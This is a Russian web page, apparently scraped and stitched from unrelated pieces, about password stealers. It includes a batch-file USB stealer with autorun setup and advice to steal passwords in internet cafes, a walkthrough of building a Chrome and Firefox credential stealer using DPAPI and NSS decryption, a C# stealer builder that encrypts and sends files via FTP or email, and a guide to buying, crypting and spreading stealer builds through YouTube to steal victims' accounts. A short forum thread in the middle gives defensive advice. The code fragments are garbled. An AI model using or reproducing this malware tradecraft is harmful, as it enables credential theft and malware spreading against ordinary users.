Что делать если на компьютере стиллер
Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.
- Не ругается антивирус;
- Скорость работы;
- Простота в доработке;
- Возможность мгновенного запуска;
- Портативность.
- Autorun не работает на Windows 8+;
- Постоянное созданиеудаление autorun.inf;
- Личное присутствие;
- Только для Windows.
Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов
Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.
Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.
Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.
Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.
Создаём стиллер паролей для браузеров
Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.
Создаём текстовый документ и пишем туда следующий код:
d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %
d0Opera
copy /y coockies.dat %
d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %
d0Mozilla
copy /y key3.db %
d0Mozilla
copy /y signons.sqlite %
d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %
Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.
Теперь нужно создать файл autorun.inf со следующей командой:
Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.
Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.
Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Опытные игроки в онлайн-играх знают, что такое стиллер, как не словить его и даже как создать. Однако создание и распространение карается законом, поэтому лучше не заниматься таким. Так что же такое стиллер?
Когда инфицированная программа начинает работу, то сначала управление получает вирус. Вирус заражает другие программы, а также выполняет запланированные деструктивные действия. Для маскировки своих действий вирус активизируется не всегда, а лишь при выполнении определенных условий (истечение некоторого времени, выполнение определенного числа операций, наступления некоторой даты или дня недели и т. д.).
Стиллер представляет собой программный код, который служит для хищения паролей и прочих данных с компьютера. Раньше данные отправлялись на сниффер, но сейчас уже активно по Интернету распространены коды, которые отправляют похищенное на почту.
Как защитить себя?
В сети интернет мало информации о том, что такое «Стиллеры» и как ими пользоваться. Нужно помнить о том, что они создаются не просто так, ради забавы. Основной их целью является добыча полезной информации с компьютера жертвы для последующей продажи. Создавать и использовать «Стиллер» определенно не стоит, так как за это могут привлечь к ответственности, в том числе и к уголовной. Нужно остерегаться «Стиллера», максимально защитив свой компьютер и не качать файлы с неизвестных источников.
Храните ваши пароли в облаке, пароль от которого вы будете знать на память, это самый надежный способ защитить свои данные. Никогда не сохраняйте пароли и не используйте никакие автозаполнения форм, когда вы например используете обменники валют в автозаполнение могут попасть данные вашей карты, ваш номер телефона и e-mail.
Принцип работы вредоноса
Cтиллеры бывают разные, от разных кодеров с разными возможностями. Они могут воровать все сохраненные вами пароли из всех браузеров, сессию из телеграмма и прочих мессенджеров, куки файлы (для входа на сайты), файлы кошельков популярных криптовалют для дальнейшего их обналичивания, файлы с рабочего стола определенного расширения .doc/.docx/.txt/.log (часто люди хранят файлик с паролями прямо на рабочем столе).
Все эти данные приходят вам в админ-панель от стиллера, где указано с какого IP адреса и имени компьютера это все прилетело. Грубо говоря мы можем забрать все самое ценное, что может быть на компьютере.
После покупки вируса у хакеров вам, как правило, выдают готовую к использованию версию софта с доступом в админ-панель, к тому же дополнительно настраивать уже ничего не нужно. Пример панели на рисунке ниже.
Как создать свой стиллер?
Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.
Браузеры в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.
Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом. Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.
Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.
Chrome
Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:
Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.
Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).
Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family , оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).
Если условие browser_family == 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family == 1 — Firefox. Идентификатор CHROME_DB_PATH указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции SHGetFolderPath , передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA , которое означает:
Функция SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath . Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:
После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH .
База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.
Теперь подключаемся к базе командой sqlite3_open_v2 . Ее прототип:
Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK , в противном случае возвращается код ошибки.
Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.
Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec() .
Эта функция имеет такой прототип:
Первый аргумент — наша база паролей, второй — это команда SQL, которая вытаскивает URL файла, логин, пароль и имя пользователя, третий аргумент — это функция обратного вызова, которая и будет расшифровывать пароли, четвертый — передается в нашу функцию обратного вызова, ну а пятый аргумент сообщает об ошибке.
Давай остановимся подробнее на callback-функции, которая расшифровывает пароли. Она будет применяться к каждой строке из выборки нашего запроса SELECT . Ее прототип — int (*callback)(void*,int,char**,char**) , но все аргументы нам не понадобятся, хотя объявлены они должны быть. Саму функцию назовем crack_chrome_db , начинаем писать и объявлять нужные переменные:
В этом цикле формируем BLOB (то есть большой массив двоичных данных). Далее выделяем память, читаем блоб и инициализируем поля DATA_BLOB :
А теперь приступим непосредственно к дешифровке. База данных Chrome зашифрована механизмом Data Protection Application Programming Interface (DPAPI). Суть этого механизма заключается в том, что расшифровать данные можно только под той учетной записью, под которой они были зашифрованы. Другими словами, нельзя стащить базу данных паролей, а потом расшифровать ее уже на своем компьютере. Для расшифровки данных нам потребуется функция CryptUnprotectData .
После этого выделяем память и заполняем массив passwds расшифрованными данными.
Firefox
Переходим к Firefox. Это будет немного сложнее, но мы все равно справимся! Для начала давай получим путь до базы данных паролей. Помнишь, в нашей универсальной функции get_browser_path мы передавали параметр browser_family ? В случае Chrome он был равен нулю, а для Firefox поставим 1.
В случае с Firefox мы не сможем, как в Chrome, сразу указать путь до папки пользователя. Дело в том, что имя папки пользовательского профиля генерируется случайно. Но это ерундовая преграда, ведь мы знаем начало пути ( \\Mozilla\\Firefox\\Profiles\\ ). Достаточно поискать в нем объект «папка» и проверить наличие в ней файла \\logins.json «. Именно в этом файле хранятся интересующие нас данные логинов и паролей. Разумеется, в зашифрованном виде. Реализуем все это в коде.
В самом конце переменная db_loc , которую мы передавали в качестве аргумента в нашу функцию, содержит полный путь до файла logins.json , а функция возвращает 1, сигнализируя о том, что она отработала корректно.
Теперь получим хендл файла паролей и выделим память под данные. Для получения хендла используем функцию CreateFile , как советует MSDN.
Все готово, но в случае с Firefox все не будет так просто, как с Chrome, — мы не сможем просто получить нужные данные обычным запросом SELECT, да и шифрование не ограничивается одной-единственной функцией WinAPI.
Дополнительная информация: Network Security Services (NSS)
Браузер Firefox активно использует функции Network Security Services для реализации шифрования своей базы. Эти функции находятся в динамической библиотеке, которая лежит по адресу C:\Program Files\Mozilla Firefox\nss3.dll .
Все интересующие нас функции нам придется получить из этой DLL. Сделать это можно стандартным образом, при помощи LoadLibrary\GetProcAdress . Код однообразный и большой, поэтому я просто приведу список функций, которые нам понадобятся:
- NSS_Init ;
- PL_Base64Decode ;
- PK11SDR_Decrypt ;
- PK11_Authenticate ;
- PK11_GetInternalKeySlot ;
- PK11_FreeSlot .
Это функции инициализации механизма NSS и расшифровки данных. Давай напишем функцию расшифровки, она небольшая. Я добавлю комментарии, чтобы все было понятно.
Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нём некорректно.
Вам необходимо обновить браузер или попробовать использовать другой.
Leorcore
Новичок
Ситуация такая, сгорел ( поиграл в казик :D ) и пошел я как то раз качать читы на радмир крмп, нашел на ютубе, там была сборка с клео, я ее установил гонял дня 3-4 особо сервак не разносил прост на спидхаке катался, ну и акк у меня увели, благо были все привязки, востановил пароль и когда заходил аунтифекатор не сработал, не просил ввести код, но имущества у меня уже не было, хочу узнать как можно узнать остался ли у меня стиллер на компе и если да то как его удалить, если что я все читы уже удалил и играю на чистом радмире. :/
(говорить что я далбеб не надо, я и так ето знаю :3)
look mom, i can fly
Хм а в .txd файле тоже может быть стиллер?
просто я еще скачивал в группе вк такой файл который снегопад убирает
тыкни на спойлер и прочитай ответ
Leorcore
Новичок
емае ._. пожалуй легче будет вернуть компуктер в исходное состояние с форматированием дисков, слава богу недавно винду поставил, не много файлов потеряю
look mom, i can fly
MAHEKEH
Известный
Посмотри как отслеживать процессы в интернете, отправку инфы там и тд, это не так сложно.
WireShark, Analyzer, можешь для фулл пака поставить Антистиллер ДаркПикселя
и всё это дело чекнуть АВП ( бесполезным, но по моим рассуждениям ниже вполне уместным )
Включи показ скрытых и системных файлов и смотри папку с гта, папку Temp
как правило в клео стиллеры бомжатские и древние, выпалить их не так уж и сложно
( хотя не будем забывать что есть актуальные сервисы которые до сих пор пишут их не только на все форматы но и на клео тоже, типо почему бы и нет )
ну и конечно удалить гта которую качал
Logiii
Новичок
Смотри чекать ратник как.
Берёш скачиваеш process haker 1 или 2.
Запускаеш КРМП.
Запускаеш скрипт. (желательно в оконном режиме КРМП держать)
Пролистываеш в самый низ.
Если там есть что то по python,или какой то включённый хост ратник.
Так же если стиллер просто удали вроде только файлы кто пишет сноси винду ненадо.
Так же удали все сборки,переустанови самп,радмир.
Майнер хз как определять вроде если оч комп тормазит. (скорее всего у тебя так так как стиллером очень при очень сложно взломать почту и т.п)
Logiii
Новичок
Смотри чекать ратник как.
Берёш скачиваеш process haker 1 или 2.
Запускаеш КРМП.
Запускаеш скрипт. (желательно в оконном режиме КРМП держать)
Пролистываеш в самый низ.
Если там есть что то по python,или какой то включённый хост ратник. (Не стоит паниковать если ты на панике выключи инет или пк и зайди ночью так же сейчас я тебе скажу как избавится от ратника)
Включаеш этот скрипт и заходиш в игру 1.
Находиш этот низ в самом низу.
Правоя кнопка мыши.
Там будет что-то на Ter
Включаеш это что то.
Ты выключил этот ратник на время пока перезагрузиш ПК.
Если у тебя не открывается process haker то всё габбела.
Иди к компьютерщику.
Так же если стиллер просто удали вроде только файлы кто пишет сноси винду ненадо.
Так же удали все сборки,переустанови самп,радмир.
Майнер хз как определять вроде если оч комп тормазит. (скорее всего у тебя так так как стиллером очень при очень сложно взломать почту и т.п)
Кратко о программе
- Умеет брать заданные файлы, шифровать и высылать на FTP или email.
- Написан с применением 22-го паттерна каталога GOF «Шаблонный метод», очень легко расширять ассортимент для пересылки. На выходе exe 9 Кб.
- Только сам билдер может открыть полученный контейнер (сериализованный словарь <Name, Data>), расшифровать и вынуть сохраненные файлы.
- Ключ хардкорный.
- Иконку не задает, от аверов не бегает.
Ставим задачи и определяем требования
Итак, попробуем предположить, как хакеры размышляют на данном этапе. Для них проблема заключается в том, что у пользователя есть файлы, которые интересны не только ему. Возможно, юзер даже и не знает, что они существуют и где точно расположены, но от этого хакерам легче не становится. Надо каким-то образом получить их копию и посмотреть, что внутри, — кто знает, может быть, это именно то, что нужно?
Чтобы своими действиями не беспокоить пользователя, не прерывать его сериалы и не мешать общению в социальных сетях, хакеры добавляют в свои программы определенный функционал. Их программы имеют небольшой размер и молча выполняют свою работу (silent mode). Целевой платформой на сегодняшний день обычно выбирают Windows 7 и более старшие версии. XP — дело хорошее, но она сдает позиции, и, по данным одного известного антивирусного разработчика, ее доля на конец 2015 года составит всего 16–17%.
Проектируем и конструируем
- Stealer — логика и интерфейс;
- Stealer.Targets — файлы, которые будут целью программы;
- Stealer.STUB — собственно сам стаб;
- Stealer.Extension — расширяющие методы (один потребуется).
Основная идея этого класса заключается в формировании структуры алгоритма, который уже будет реализован в Google Chrome, ICQ, Skype и так далее.
Да, небольшое дополнение. В данном примере логика работы приложения находится внутри разделяемого класса Form, если хочется дополнительно реализовать консольный или WPF-интерфейс, то ее следует вынести отдельно и подписаться на группу ожидаемых событий. Подробнее про правильную архитектуру можно почитать у Стива Макконнелла (Code complete).
Интерфейс
Код под кнопками мог бы быть весьма тривиальным, но, как говорится, не тут-то было. Выдержка из BUILD:
Получение самих ресурсов происходит следующим образом. Создается экземпляр var assembly = Assembly.GetExecutingAssembly(), и в потоке Stream stream = assembly.GetManifestResourceStream(resourceName) происходит чтение данных до конца и возврат строки текста. Переменная resourceName имеет значение @«Stealer.STUB.Stub.cs» что соответствует полному пути расположения указанного файла. Аналогичным образом ведется работа с другими элементами решения, в коде эта строка выглядит так: "@«Stealer.Targets..cs», className", где className — это имя класса и текст на чекбоксе.
Задача кнопки Check all сводится к управлению галочками сразу на всех целях. Реализуется это через приватное поле класса Form булева типа и один метод, который принимает это значение в качестве аргумента, применяя его к каждому чекбоксу. На обработчике события считывается значение указанного поля и передается методу, по завершению его работы оно меняется на противоположное.
Переходим к «&OpenFile. ». Здесь придется забежать немного вперед, перед прочтением рекомендую ознакомиться с разделом «Стаб». Код в данном обработчике организован стандартным способом, открывается OpenFileDialog и получает полное имя файла (содержащее путь), читает его в FileStream и копирует в MemoryStream для того, чтобы можно было расшифровать байты. В итоге имеем исходный поток, который надо десериализовать (Deserialize) в словарь, созданный в стабе Dictionary<string, byte[]>. Получается, что по сети был передан объект, сохранивший свое состояние. Плюсы заключаются в том, что это хорошо работает, не требуется использовать код архивирования, а промежуточный результат прочитать сможет только хакер или его друзья реверсеры. Далее следует сохранение содержащегося в оперативной памяти словаря на HDD, тут и пригодится строка, которая задает имя файла. Реализовано данное действие через foreach по «KeyValuePair<string, byte[]> item in _files», в теле цикла которого две строки: первая «string filePath = string.Format(folderPath + @"\", item.Key);» и завершает его запись «File.WriteAllBytes(filePath, item.Value);». Все лаконично и красиво.
Это класс, который будет скомпилирован в отдельную исполняемую сборку с помощь экземпляра CSharpCodeProvider и метода CompileAssemblyFromSource. Для того чтобы он стал доступным для чтения в рантайме, нужно в его параметрах (F4) указать Build Action = Embedded Resource, а строкой ниже Do not copy. Чтобы студия не ругалась на два метода Main, в настройках проекта указывается Startup object = Stealer.Program, это на тот случай, когда класс «Стаб» не является ресурсом и можно провести анализ кода на наличие ошибок. Теперь давай посмотрим на пример кода.
В первую очередь здесь следует обратить внимание на то, что вся основная работа выполняется с использованием обобщенной коллекции List и абстракции. Все элементы коллекции апкастятся до абстрактного класса, и на их экземплярах вызывается метод DoJob, который проверяет, есть ли искомый файл, и, если ответ да, он пытается его достать. Далее каждый полученный файл помещается в коллекцию Dictionary<string, byte[]>, в которой хранится имя программы, содержащей файл, и сами данные в виде массива байтов. После обхода всей коллекции List и заполнения Dictionary производится сериализация последнего, затем его шифрование и, наконец, отправка по указанному каналу связи.
В листинге не отображены методы SendViaFtp и SendViaEmail, примеры которых будут показаны далее, метод Encrypt (на самом деле конкретная реализация не имеет значения, выбирается любой симметричный алгоритм), класс AbstractFile и поля класса, которые будут хранить в себе логины, пароли а также ключи шифрования. На этом все, больше ничего интересного и нового в стабе нет.
Алгоритм получения файлов
Благодаря паттерну «Шаблонный метод» проектировать классы для поиска и получения файлов стало очень просто, можно добавлять десятки новых, и при этом не потребуется вносить никаких изменений в использующий их код, то есть стаб. Вызывающей стороне все равно, что и как реализовано внутри, называется это дело абстрагированием вариантов исполнения. Для примера посмотрим на реализацию класса GoogleChrome, из названия которого можно догадаться о том, что именно он должен найти и скопировать.
Метод ToString переопределен для того, чтобы словарь из стаба было удобнее заполнять и анализировать при получении. Другие классы по поиску файлов выглядят идентично, разница лишь в пути и, возможно, наличии дополнительных проверок в зависимости от типа хранения. Чтобы не забыть, какие методы надо реализовать от унаследованного класса, или просто сократить время клавиатурного ввода, на AbstractFile можно нажать мышкой и подождать появления подсказки implement abstract class, которая автоматически построит нужный код.
Программирование без напряга
Узнать, сколько всего можно дописать в программе без особых усилий и как сэкономить кучу времени на личных исследованиях, хакерам помогает ресурс Password Secrets of Popular Windows Applications, на нем заботливо выложена информация о расположении интересующих файлов и утилит для анализа.
Алгоритм отправки файлов
Заключение
Скажу сразу, данная статья была на других бордах, но это лично мною написанная статья, так что, не надо пиздеть "Спиздил и т.д."
Так ебана, всем привет, в этой статье я хотел бы рассказать вам, как приобрести и начать пользоваться стиллером. Статья исключительно для новичков и начинающих, для знающий, ничего интересного тут не будет.
Хотелось бы начать с того, как все таки приобрести стиллер. Все очень просто, приобрести стиллер вы можете по данной ссылке - ага, наебал, здесь не будет рекламы другого борда (Не буду кидать на какой-то определенный стиллер), выбираете стиллер (выбирайте тот стиллер, в котором более менее нормальные отзывы). Выбрали стиллер и пишите ТС'у о покупке, он вам все объясняет, отвечает на ваши вопросы и т.д. Обычно после оплаты (иногда до) вы получаете билд (собственно ваш стиллер) и у некоторых сразу идет DeleteBuild (удаляет ваш стиллер с пк).
Как проверить собственно отстук стиллера, есть много вариантов: на дедике, на виртуалке, на сайте TestMyBin (не реклама), на своем пк (ВАЖНО, ЭТОГО ДЕЛАТЬ СТРОГО НЕ РЕКОМЕНДУЕТСЯ). Я бы сам рекомендовал вам все проверять на TestMyBin, просто загружаете файл и ждете приход лога. Бывают разные стиллеры, у кого-то логи приходят на Хостинг, у кого-то в телеграмм, у кого-то на почту (Возможно еще что-то упустил, не пиздите ток).
Так, проверили отстук, если лог пришел, значит все нормально, билд работает, если лог не пришел, идите в личку с тс'ом и выебывайтесь на него (спросите вежливо, "Почему не приходит лог?"), ТС должен будет разобраться в данном вопросе. Так, ТС разобрался, у вас все работает, все нормально.
Переходим к следующему вопросу, как им пользоваться и нахуй собственно вам вообще этот билд.
Как начать пользоваться стиллером и нахуя вы собственно вообще приобрели данный стиллер, все очень просто, надо будет гнать трафик на данный стиллер и пиздить аккаунты Мамонтов.
Как же все таки начать распространять свой стиллер, все очень просто, для этого есть много способов: группы вк, ютуб, покупка инсталлов, спам на форумах (не рекомендую, вам дадут пизды и я лично за вами выеду). ОЧЕНЬ ВАЖНО перед тем, как начать распространять стиллер, проверьте на детект свой билд, советую проверять на AntiScan или SpyralScaner, если вы уебок и залили на VirusTotal, то вам пизда. Если ваш детект составляет больше 6/26 например, то все очень плохо и ТС пидр, идите криптуйте билд, закриптовать билд можно в данном разделе - ага, опять наебал, рекламы не будет (так же не буду выделять особых людей для крипта). ОЧЕНЬ ВАЖНО после крипта файла, проверяйте его опять на отсук (как проверить, написал выше в статье).
Так ебана, у вас детект 2-3/26, ну или вообще 0, все ахуенно, переходим к тому, на какой файлообменник вам залить свой билд, скажу сразу, все билды должны быть в архиве и под паролем, если вы УТЫРОК который залил билд на файлообменник без архива, то у вас писюн не вырастет. Всегда нужно заливать в архиве, и похуй какой файлообменник (некоторые кнч не сливают, но все же).
Распространять стиллер очень просто, 80% мамкиных хацкеров используют ютуб в качестве основного трафика, я так же советую использовать его, заливаете видосы на ютуб (читы, софт, накрутка и еще всякая поебота), в описание кидаете ссылку скачивание билда и естественно пароль от архива, большинство русских доверяют Яндекс Диск (Не реклама). Так же, если вы ленивый ублюдок и залили всего 1 видос на ютуб и ждете 100+ логов в минуту, хуй там, люди по 50-60 видосов заливают, главное хорошее описание и теги (теги пиздец решают).
Читайте также: